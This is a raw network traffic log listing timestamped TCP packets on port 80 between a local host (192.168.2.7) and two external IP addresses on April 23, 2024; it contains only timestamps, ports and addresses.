Apr 23, 2024 09:43:14.579853058 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579858065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579870939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579871893 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579888105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579896927 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579899073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579916954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579929113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579932928 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579941034 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579953909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579965115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579966068 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579974890 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579977989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579993010 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580003977 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580005884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580027103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580040932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580048084 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580051899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580060005 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580064058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580075979 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580086946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580104113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580111027 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580117941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580127954 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580130100 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580142975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580147982 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580154896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580167055 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580168009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580180883 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580192089 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580192089 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580204964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580216885 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580228090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580244064 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.580245018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.580262899 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.622368097 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.622406960 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.622419119 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.622430086 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.631758928 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.746701956 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.746754885 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.807109118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807123899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807135105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807146072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807157040 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807197094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807209015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807209015 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807220936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807254076 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807290077 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807307005 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807320118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807332039 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807348013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807356119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807360888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807365894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807378054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807391882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807395935 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807410002 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807413101 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807423115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807435036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807446957 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807449102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807471037 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807495117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807508945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807521105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807532072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807543993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807549000 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807555914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807569027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.807578087 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.807612896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.808007956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808080912 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808185101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808224916 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.808234930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808247089 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808281898 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.808438063 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808507919 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.808527946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808758020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808830976 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.808835030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808959961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808971882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808990955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.808994055 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.809003115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.809014082 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.809021950 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.809036016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.809047937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.809056997 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.809079885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.810353994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.810368061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.810405016 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.810540915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.810554028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.810611010 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811194897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811208010 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811250925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811264038 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811269045 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811297894 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811314106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811327934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811341047 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811356068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811368942 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811381102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811393023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811404943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811460972 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811491966 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811492920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811510086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811522007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811533928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811544895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811556101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811558962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811568975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811583996 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811602116 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811630964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811641932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811654091 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811665058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811676025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811683893 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811690092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811698914 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811703920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811716080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811728001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811729908 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811736107 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811739922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811764002 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811779976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811796904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811808109 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811814070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811821938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811835051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811841011 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811846018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811856985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811867952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811872959 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811878920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811889887 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811894894 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811898947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811912060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811923027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811933994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811938047 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811945915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811958075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811968088 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.811969995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.811989069 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812005997 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812078953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812093973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812109947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812125921 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812136889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812146902 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812148094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812159061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812171936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812176943 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812186956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812195063 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812199116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812208891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812215090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812221050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812231064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812232018 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812242985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812253952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812263012 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812264919 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812277079 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812288046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812290907 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812304974 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812305927 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812318087 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812354088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812366009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812376976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812388897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812402964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812407017 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812416077 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812427044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812437057 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812439919 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812448978 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812450886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812467098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812467098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812478065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812489986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812500000 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812500954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812511921 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812522888 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812532902 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812534094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812541008 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812563896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812609911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812622070 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812633991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812645912 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812648058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812664032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812669039 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812676907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812689066 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812701941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812712908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812715054 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812731028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812738895 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812746048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812756062 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812757969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812769890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812781096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812788963 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812792063 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812803984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812814951 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812822104 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812827110 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812830925 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812838078 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812846899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812860966 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812863111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812875986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812886953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812887907 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812899113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812901020 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812911034 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812922955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812928915 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812962055 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.812972069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812984943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.812995911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813008070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813009024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813021898 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813033104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813035965 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813049078 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813060999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813060999 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813071966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813083887 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813096046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813097000 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813107014 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813119888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813121080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813134909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813139915 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813147068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813158035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813169956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813175917 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813180923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813193083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813198090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813204050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813215971 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813218117 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813227892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813235044 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813240051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813251019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813266039 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813290119 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813364029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813375950 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813386917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813397884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813409090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813421011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813421965 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813431978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813446045 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813457966 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813461065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813479900 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813481092 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813492060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813493013 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813503981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813514948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813525915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813532114 CEST	49702	80	192.168.2.7	176.97.76.106
